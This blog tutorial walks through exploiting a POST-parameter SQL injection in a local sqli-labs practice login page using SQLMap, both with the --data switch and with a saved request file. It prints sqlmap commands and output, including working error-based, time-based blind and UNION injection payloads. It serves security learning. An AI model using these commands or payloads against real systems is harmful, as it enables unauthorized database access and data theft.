Handling injections in POST request

Until now, we've just considered injections in the GET requests and parameters, if you have not yet completed them then click the below links:


SQLMap Brief Introductory

    Introduction to SQLMap: A Brief Overview

    This article provides a concise introduction to SQLMap, a powerful open-source penetration testing tool used for detecting and exploiting SQL injection vulnerabilities in web applications. It covers the basics of SQLMap and its usage, making it an essential read for cybersecurity enthusiasts.


    Detect & Exploit SQL Injection 

    Detecting and Exploiting SQL Injection Vulnerabilities

    This comprehensive guide delves into the detection and exploitation of SQL injection vulnerabilities in web applications. It provides step-by-step instructions on identifying SQL injection vulnerabilities and leveraging them to gain unauthorized access to databases. This resource is invaluable for web developers and security professionals seeking to bolster their understanding of SQL injection attacks.


    Dumping The Data

    Dumping Data in Error-Based SQL Injection Scenario

    This guide provides insights into dumping data in error-based SQL injection scenarios, an essential technique for extracting sensitive information from vulnerable databases. It offers step-by-step instructions and practical examples to help security professionals understand and exploit error-based SQL injection vulnerabilities effectively.



    Let us now look at an injection in a POST parameter and exploit the same with the SQL Map.


    It will redirect to a login Portal, as below screenshot:

    In the Username field, we try to insert a stray character to break the query as we did before. 

    Let's see what happens, when we click on Submit button.

    Upon submitting the work, we get a typical MySQL error. Now, we need to check exactly which POST parameter is affected. 

    To view the request we will use a Firefox add-on known as Live HTTP Headers which can be easily installed from the Firefox add-on gallery.

    Now, Launch the HTTP Header Live extension, and refresh the page to load the entries.

    So, based on the output of Live HTTP Headers, the affected parameter is "uname".

    Let's use SQLMap's --data switch to exploit this POST-based scenario. 

    Now, we'll enforce the parameter to check to uname and pass the POST parameters inside --data. Let's try this out in SQLMap. 

    ┌──(kali㉿kali)-[~]
    └─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-11/ --data "uname=test'&passwd=&submit=Submit" -p uname

    Here's what you'll see:

    ---
    Parameter: uname (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: uname=test' AND (SELECT 8831 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(8831=8831,1))),0x71716b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sQZr&passwd=&submit=Submit

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: uname=test' AND (SELECT 2551 FROM (SELECT(SLEEP(5)))IkJg)-- METZ&passwd=&submit=Submit

        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: uname=test' UNION ALL SELECT NULL,CONCAT(0x717a626b71,0x6b566a6270656b416c57795a4d5978734f5a5a476c677976666b73684141704d5479534f44505055,0x71716b7a71)-- -&passwd=&submit=Submit
    ---
    [13:57:01] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.4.37, PHP 5.6.39
    back-end DBMS: MySQL >= 5.0 (MariaDB fork)
    [13:57:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'

    Look at that, SQLMap exploited the same level of easiness as it did in the GET-based injections

    Another way of exploiting this is by capturing the POST request and manually specifying the parameter.

    ┌──(kali㉿kali)-[~]
    └─$ nano requirement.txt

    Now we've saved the request. We'll utilize the -r switch to read the HTTP request from the aforementioned file and then specify the vulnerable parameter, which in our case is uname through the -p switch.

    ┌──(kali㉿kali)-[~]
    └─$ sqlmap -r requirement.txt -p uname

            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.6.7#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting @ 13:57:47 /2022-12-06/

    [13:57:47] [INFO] parsing HTTP request from 'requirement.txt'
    [13:57:47] [INFO] resuming back-end DBMS 'mysql' 
    [13:57:47] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: uname (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: uname=test' AND (SELECT 8831 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(8831=8831,1))),0x71716b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sQZr&passwd=&submit=Submit

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: uname=test' AND (SELECT 2551 FROM (SELECT(SLEEP(5)))IkJg)-- METZ&passwd=&submit=Submit

        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: uname=test' UNION ALL SELECT NULL,CONCAT(0x717a626b71,0x6b566a6270656b416c57795a4d5978734f5a5a476c677976666b73684141704d5479534f44505055,0x71716b7a71)-- -&passwd=&submit=Submit
    ---
    [13:57:48] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: PHP 5.6.39, Apache 2.4.37
    back-end DBMS: MySQL >= 5.0 (MariaDB fork)
    [13:57:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'

    [*] ending @ 13:57:48 /2022-12-06/

    And again! Through this technique, we achieved the same result but in a different manner. 

    I demonstrated this through a file because this can be used when exploiting SQL injections that are not straightforward; when the payload is SOAP (XML-based) or JSON then we can use the same -r switch and feed the request to SQL Map through a file and exploit the injection.

Tags

You may like these posts

Show more

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

If you have any doubts or any queries you can specify here.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!